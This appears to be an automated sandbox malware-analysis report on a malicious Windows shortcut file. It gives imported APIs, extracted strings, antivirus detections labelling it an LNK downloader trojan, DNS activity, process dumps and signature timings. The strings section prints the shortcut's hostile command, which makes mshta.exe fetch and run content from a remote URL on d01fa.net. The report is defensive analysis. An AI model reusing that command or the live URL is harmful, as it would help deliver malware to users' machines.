api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthority
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCloseKey
shell32.dll.SHGetKnownFolderPath
api-ms-win-downlevel-advapi32-l1-1-0.dll.CopySid
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertSidToStringSidW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventRegister
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueA
iertutil.dll.#701
iertutil.dll.#703
iertutil.dll.#702
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExA
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemAlloc
ws2_32.dll.#115
ws2_32.dll.#111
iertutil.dll.#791
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventActivityIdControl
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExW
ws2_32.dll.#23
iphlpapi.dll.GetBestInterfaceEx
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
iphlpapi.dll.GetIfEntry2
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHGetValueA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegSetValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegDeleteValueW
iphlpapi.dll.NotifyUnicastIpAddressChange
urlmon.dll.CoInternetGetSession
urlmon.dll.#471
api-ms-win-downlevel-shlwapi-l2-1-0.dll.SHStrDupW
ole32.dll.CoTaskMemAlloc
dnsapi.dll.DnsGetProxyInformation
rpcrt4.dll.NdrClientCall2
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
iphlpapi.dll.GetAdaptersAddresses
ws2_32.dll.GetAddrInfoW
oleaut32.dll.#8
urlmon.dll.CoInternetCreateSecurityManager
urlmon.dll.CoInternetCreateZoneManager
ole32.dll.CoInitializeEx
ole32.dll.CoUninitialize
ole32.dll.CoRegisterInitializeSpy
ws2_32.dll.GetAddrInfoExW
oleacc.dll.LresultFromObject
user32.dll.GetGUIThreadInfo
user32.dll.GetCursorInfo
user32.dll.GetWindowInfo
user32.dll.GetTitleBarInfo
user32.dll.GetScrollBarInfo
user32.dll.GetComboBoxInfo
user32.dll.GetAncestor
user32.dll.RealChildWindowFromPoint
user32.dll.RealGetWindowClassW
user32.dll.GetAltTabInfoW
user32.dll.GetListBoxInfo
user32.dll.GetMenuBarInfo
user32.dll.SendInput
user32.dll.BlockInput
user32.dll.LogicalToPhysicalPoint
user32.dll.PhysicalToLogicalPoint
user32.dll.WindowFromPhysicalPoint
user32.dll.GetPhysicalCursorPos
kernel32.dll.GetModuleFileNameW
kernel32.dll.VirtualAllocEx
kernel32.dll.VirtualFreeEx
ntdll.dll.NtQueryInformationProcess
ntdll.dll.NtAllocateVirtualMemory
ntdll.dll.NtFreeVirtualMemory
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
sxs.dll.SxsOleAut32MapIIDToProxyStubCLSID
advapi32.dll.RegQueryValueW
oleacc.dll.ObjectFromLresult
advapi32.dll.RegOpenKeyW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
ole32.dll.RegisterDragDrop
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
ole32.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
urlmon.dll.#407
urlmon.dll.#446
api-ms-win-downlevel-ole32-l1-1-0.dll.CoWaitForMultipleHandles
msls31.dll.#62
msls31.dll.#63
msls31.dll.#66
msls31.dll.#61
msls31.dll.#71
msls31.dll.#1
msls31.dll.#49
msls31.dll.#52
msls31.dll.#48
msls31.dll.#3
d2d1.dll.#1
dwrite.dll.DWriteCreateFactory
dxgi.dll.CreateDXGIFactory1
gdi32.dll.D3DKMTOpenAdapterFromGdiDisplayName
gdi32.dll.D3DKMTCloseAdapter
gdi32.dll.D3DKMTQueryAdapterInfo
gdi32.dll.D3DKMTOpenAdapterFromDeviceName
setupapi.dll.SetupDiGetClassDevsW
setupapi.dll.SetupDiEnumDeviceInterfaces
setupapi.dll.SetupDiGetDeviceInterfaceDetailW
setupapi.dll.SetupDiDestroyDeviceInfoList
setupapi.dll.SetupDiGetDevicePropertyW
wintrust.dll.WinVerifyTrust
d3d11.dll.D3D11CreateDevice
dxgi.dll.CompatValue
d3d10warp.dll.D3DKMTOpenAdapterFromGdiDisplayName
d3d10warp.dll.D3DKMTOpenAdapterFromDeviceName
d3d10warp.dll.D3DKMTGetDisplayModeList
d3d10warp.dll.D3DKMTSetVidPnSourceOwner
d3d10warp.dll.D3DKMTSetDisplayMode
d3d10warp.dll.D3DKMTCloseAdapter
d3d10warp.dll.D3DKMTSetGammaRamp
d3d10warp.dll.D3DKMTGetDeviceState
d3d10warp.dll.D3DKMTQueryAdapterInfo
d3d10warp.dll.D3DKMTWaitForVerticalBlankEvent
gdi32.dll.D3DKMTCreateDCFromMemory
gdi32.dll.D3DKMTDestroyDCFromMemory
gdi32.dll.D3DKMTCheckVidPnExclusiveOwnership
gdi32.dll.D3DKMTCheckMonitorPowerState
gdi32.dll.D3DKMTCheckSharedResourceAccess
d3d10warp.dll.D3DKMTGetMultisampleMethodList
d3d10warp.dll.D3DKMTSetDisplayPrivateDriverFormat
d3d10warp.dll.D3DKMTDestroySynchronizationObject
d3d10warp.dll.D3DKMTCreateSynchronizationObject
d3d10warp.dll.D3DKMTDestroyContext
d3d10warp.dll.D3DKMTCreateContext
d3d10warp.dll.D3DKMTGetContextSchedulingPriority
d3d10warp.dll.D3DKMTSetContextSchedulingPriority
d3d10warp.dll.D3DKMTPresent
d3d10warp.dll.D3DKMTDestroyDevice
d3d10warp.dll.D3DKMTCreateDevice
d3d10warp.dll.D3DKMTQueryAllocationResidency
d3d10warp.dll.D3DKMTSetAllocationPriority
d3d10warp.dll.D3DKMTDestroyAllocation
d3d10warp.dll.D3DKMTOpenResource
d3d10warp.dll.D3DKMTQueryResourceInfo
d3d10warp.dll.D3DKMTCreateAllocation
d3d10warp.dll.D3DKMTSignalSynchronizationObject
d3d10warp.dll.D3DKMTWaitForSynchronizationObject
d3d10warp.dll.D3DKMTEscape
d3d10warp.dll.D3DKMTUnlock
d3d10warp.dll.D3DKMTLock
d3d10warp.dll.D3DKMTRender
d3d10warp.dll.OpenAdapter10_2
d3d10warp.dll.#199
urlmon.dll.#421
urlmon.dll.#408
msls31.dll.#44
msls31.dll.#5
urlmon.dll.#513
user32.dll.IsWindowRedirectedForPrint
d2d1.dll.#5
oleaut32.dll.#10
"C:\Windows\System32\msHta.Exe" http://www.d01fa.net/images/D817583E/16364/11542/9f9d51bf/b0bdc66
C:\Users\Rebecca\AppData\Local\Temp\file.lnk
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
CicLoadWinStaWinSta0
Local\MSCTF.CtfMonitorInstMutexDefault1
!IECompat!Mutex

Flags

Icon ..\..\..\Windows\System32\cftmo.exe
CMD line http://www.d01fa.net/images/D817583E/16364/11542/9f9d51bf/b0bdc66
Icon %SystemRoot%\system32\SHELL32.dll

Windows
System32
cftmo.exe
C:\Windows\System32\cftmo.exe
%windir%\system32\cftmo.exe
1SPS0
user-pc
Windows
System32
msHta.Exe
#..\..\..\Windows\System32\cftmo.exe
%windir%Ahttp://www.d01fa.net/images/D817583E/16364/11542/9f9d51bf/b0bdc66!%SystemRoot%\system32\SHELL32.dll
%windir%\system32\cftmo.exe
cftmo.exe
Application
S-1-5-21-2108907110-3666731302-1928028421-1000
System32 (C:\Windows)
C:\Windows\System32\cftmo.exe

Full Results

Engine Signature Engine Signature Engine Signature
Bkav Clean MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0443ACBC CMC Clean
CAT-QuickHeal Clean McAfee LNK/Agent-FSDJ!0D928D046310 Malwarebytes Clean
VIPRE Clean K7AntiVirus Clean K7GW Clean
Arcabit Clean BitDefenderTheta Clean Cyren LNK/Trojan.MQII-5
Symantec Trojan.Gen.MBT ESET-NOD32 Clean Baidu Clean
TrendMicro-HouseCall TROJ_FRS.VSNTD720 Avast Other:Malware-gen [Trj] ClamAV Clean
Kaspersky HEUR:Trojan.WinLNK.Agent.gen BitDefender Heur.BZC.YAX.Nioc.1.0443ACBC NANO-Antivirus Clean
ViRobot Clean AegisLab Trojan.WinLNK.Acbc.4!c Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Ad-Aware Heur.BZC.YAX.Nioc.1.0443ACBC Emsisoft Heur.BZC.YAX.Nioc.1.0443ACBC (B) Comodo Clean
F-Secure Clean DrWeb Trojan.DownLoader33.28040 Zillya Clean
TrendMicro TROJ_FRS.VSNTD720 McAfee-GW-Edition LNK/Agent-FSDJ!0D928D046310 FireEye Heur.BZC.YAX.Nioc.1.0443ACBC
Sophos Troj/DownLnk-X F-Prot LNK/Trojan.MQII-5 Jiangmin Clean
Avira Clean Antiy-AVL Clean Kingsoft Clean
Microsoft Trojan:Win32/Casdet!rfn SUPERAntiSpyware Clean ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
Avast-Mobile Clean GData Heur.BZC.YAX.Nioc.1.0443ACBC AhnLab-V3 Clean
ALYac Trojan.Downloader.LnK.Gen MAX malware (ai score=98) VBA32 Clean
Zoner Clean Tencent Clean Yandex Clean
TACHYON Clean MaxSecure Clean Fortinet LNK/DownLnk.X!tr
AVG Other:Malware-gen [Trj] Panda Clean Qihoo-360 Generic/Trojan.066
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.1.5 54312 1.1.1.1 53
192.168.1.5 54724 1.1.1.1 53
192.168.1.5 63931 1.1.1.1 53
192.168.1.5 137 192.168.1.255 137
192.168.1.5 54312 8.8.8.8 53
192.168.1.5 54724 8.8.8.8 53
192.168.1.5 63931 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.d01fa.net [VT] 5.181.156.24 [VT]

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Process Name mshta.exe
PID 5120
Dump Size 13312 bytes
Module Path C:\Windows\System32\mshta.exe
Type PE image: 32-bit executable
PE timestamp 2013-10-14 05:50:08
MD5 57c57002383a5458380fb43b2dd8b699
SHA1 28b82159c9ec2ed66ae4bf2765131711d68104a6
SHA256 8f2accd8b885e059adaedd8d84f623fba3fc92967dda1b44432412cff3403138
CRC32 D49D1B5E
Ssdeep 192:iHr74pcC1NTEH1eeO+T1MYDJWwelJIRBU:2oYelsWw6
Dump Filename 8f2accd8b885e059adaedd8d84f623fba3fc92967dda1b44432412cff3403138
Download Download Zip

BinGraph Download graph

Process Name cmd.exe
PID 5152
Dump Size 302592 bytes
Module Path C:\Windows\System32\cmd.exe
Type PE image: 32-bit executable
PE timestamp 2010-11-20 09:00:27
MD5 c6b52ec2c8ecd7d69b713ce7ce3f3322
SHA1 b007ffa155c6362a49f72a6ea9ea168e72d2cb99
SHA256 31eb1439b01d1a43d16a05b3b1de955ce471eccf154b11088be4eecb7f0dad44
CRC32 F6361BA8
Ssdeep 3072:5H4NFuPLj3Cs8ZJ48kaunIDTcERYrxYVb/ToAkgjyGez1c:l4nuvCVmKncE6MbcAkgmt+
Dump Filename 31eb1439b01d1a43d16a05b3b1de955ce471eccf154b11088be4eecb7f0dad44
Download Download Zip

BinGraph Download graph

Defense Evasion Execution
  • T1064 - Scripting
    • Signature - script_network_activity
  • T1064 - Scripting
    • Signature - script_network_activity

    Processing ( 7.35 seconds )

    • 5.257 Suricata
    • 0.792 BehaviorAnalysis
    • 0.416 VirusTotal
    • 0.385 NetworkAnalysis
    • 0.221 Deduplicate
    • 0.129 AnalysisInfo
    • 0.104 CAPE
    • 0.031 ProcDump
    • 0.008 Debug
    • 0.003 Dropped
    • 0.003 TargetInfo
    • 0.001 Strings

    Signatures ( 1.608999999999998 seconds )

    • 0.475 antiav_detectreg
    • 0.163 infostealer_ftp
    • 0.157 territorial_disputes_sigs
    • 0.099 antianalysis_detectreg
    • 0.09 infostealer_im
    • 0.068 antidbg_windows
    • 0.053 antivm_vbox_keys
    • 0.035 antivm_vmware_keys
    • 0.03 infostealer_mail
    • 0.026 antivm_parallels_keys
    • 0.026 antivm_xen_keys
    • 0.022 stealth_timeout
    • 0.021 api_spamming
    • 0.019 decoy_document
    • 0.017 antivm_generic_scsi
    • 0.017 antivm_generic_diskreg
    • 0.017 antivm_vpc_keys
    • 0.016 NewtWire Behavior
    • 0.013 geodo_banking_trojan
    • 0.013 ransomware_files
    • 0.009 bypass_firewall
    • 0.008 antiav_detectfile
    • 0.008 antivm_xen_keys
    • 0.008 antivm_hyperv_keys
    • 0.008 ransomware_extensions
    • 0.007 antivm_generic_services
    • 0.006 kibex_behavior
    • 0.006 persistence_autorun
    • 0.006 OrcusRAT Behavior
    • 0.006 recon_programs
    • 0.005 Extraction
    • 0.005 betabot_behavior
    • 0.005 blackrat_registry_keys
    • 0.005 antianalysis_detectfile
    • 0.005 ketrican_regkeys
    • 0.005 darkcomet_regkeys
    • 0.005 infostealer_bitcoin
    • 0.005 masquerade_process_name
    • 0.005 limerat_regkeys
    • 0.005 recon_fingerprint
    • 0.004 antiemu_wine_func
    • 0.004 antivm_generic_disk
    • 0.004 dynamic_function_loading
    • 0.004 injection_runpe
    • 0.004 antivm_generic_bios
    • 0.004 antivm_generic_system
    • 0.003 Doppelganging
    • 0.003 InjectionCreateRemoteThread
    • 0.003 InjectionProcessHollowing
    • 0.003 exploit_heapspray
    • 0.003 injection_createremotethread
    • 0.003 malicious_dynamic_function_loading
    • 0.003 antivm_vbox_files
    • 0.003 browser_security
    • 0.003 warzonerat_regkeys
    • 0.003 remcos_regkeys
    • 0.002 InjectionSetWindowLong
    • 0.002 antidebug_guardpages
    • 0.002 antivm_vbox_window
    • 0.002 bootkit
    • 0.002 uac_bypass_eventvwr
    • 0.002 dridex_behavior
    • 0.002 infostealer_browser_password
    • 0.002 kovter_behavior
    • 0.002 mimics_filetime
    • 0.002 reads_self
    • 0.002 stealth_file
    • 0.002 virus
    • 0.002 disables_browser_warn
    • 0.002 network_torgateway
    • 0.002 medusalocker_regkeys
    • 0.001 InjectionInterProcess
    • 0.001 antiav_avast_libs
    • 0.001 antisandbox_script_timer
    • 0.001 antivm_vbox_libs
    • 0.001 cerber_behavior
    • 0.001 exec_crash
    • 0.001 exploit_getbasekerneladdress
    • 0.001 exploit_gethaldispatchtable
    • 0.001 hancitor_behavior
    • 0.001 network_tor
    • 0.001 rat_nanocore
    • 0.001 stack_pivot
    • 0.001 tinba_behavior
    • 0.001 antidbg_devices
    • 0.001 antivm_generic_cpu
    • 0.001 antivm_vmware_files
    • 0.001 browser_addon
    • 0.001 modify_proxy
    • 0.001 predatorthethief_files
    • 0.001 qulab_files
    • 0.001 modify_security_center_warnings
    • 0.001 modify_uac_prompt
    • 0.001 network_dns_opennic
    • 0.001 packer_armadillo_regkey
    • 0.001 nemty_regkeys
    • 0.001 revil_mutexes

    Reporting ( 4.019 seconds )

    • 3.471 BinGraph
    • 0.547 MITRE_TTPS
    • 0.001 PCAP2CERT